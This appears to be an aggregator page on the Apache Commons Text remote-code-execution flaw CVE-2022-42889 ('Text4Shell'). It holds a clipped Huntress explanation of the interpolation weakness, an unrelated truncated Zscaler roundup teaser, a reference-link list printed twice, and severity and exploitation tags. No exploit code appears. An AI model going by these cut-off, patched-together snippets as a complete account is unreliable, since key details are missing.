Zscaler
## Nov 2, 2022
The CISO Monthly Roundup (formerly the ThreatLabz monthly report) provides the latest threat research and relevant insights on cyber-related subjects from the ThreatLabz team and Deepen Desai, CISO at Zscaler.
The CISO Monthly Roundup (formerly the ThreatLabz monthly report) provides the latest threat research from Deepen Desai and the ThreatLabz team, along with insights on other cyber-related subjects. In October, ThreatLabz released their 2022 Data Loss Report, researched a PHP version of Ducktail infostealer, and analyzed LilithBot malware. My team a
Huntress
CVE-2022-42889 (Text4Shell): Analysis, Detection & Prevention | Huntress
blogs_huntress·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889 (Text4Shell): Analysis, Detection & Prevention | Huntress
## CVE-2022-42889 Vulnerability
Published: 12/05/2025
Written by: Nadine Rozell
## What is CVE-2022-42889 Vulnerability?
CVE-2022-42889 , widely known as "Text4Shell," is a critical remote code execution (RCE) vulnerability found in the popular Apache Commons Text library. If that sounds alarmingly familiar, it's because it shares a similar vibe with the infamous Log4Shell vulnerability. Apache Commons Text is a Java library used for, you guessed it, working with text. The vulnerability stems from how the library handles variable interpolation, which is a fancy way of saying it processes strings that can dynamically pull in and expand other values.
The problem is that some of the default "lookups" (the mechanisms that find and replace these variables) could be tricked into executing c
http://packetstormsecurity.com/files/171003/OX-App-Suite-Cross-Site-Scripting-Server-Side-Request-Forgery.htmlhttp://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2023/Feb/3http://www.openwall.com/lists/oss-security/2022/10/13/4http://www.openwall.com/lists/oss-security/2022/10/18/1https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1omhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0022https://security.gentoo.org/glsa/202301-05https://security.netapp.com/advisory/ntap-20221020-0004/http://packetstormsecurity.com/files/171003/OX-App-Suite-Cross-Site-Scripting-Server-Side-Request-Forgery.htmlhttp://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2023/Feb/3http://www.openwall.com/lists/oss-security/2022/10/13/4http://www.openwall.com/lists/oss-security/2022/10/18/1https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1omhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0022https://security.gentoo.org/glsa/202301-05https://security.netapp.com/advisory/ntap-20221020-0004/
2022-10-13
Published
Exploited in the wild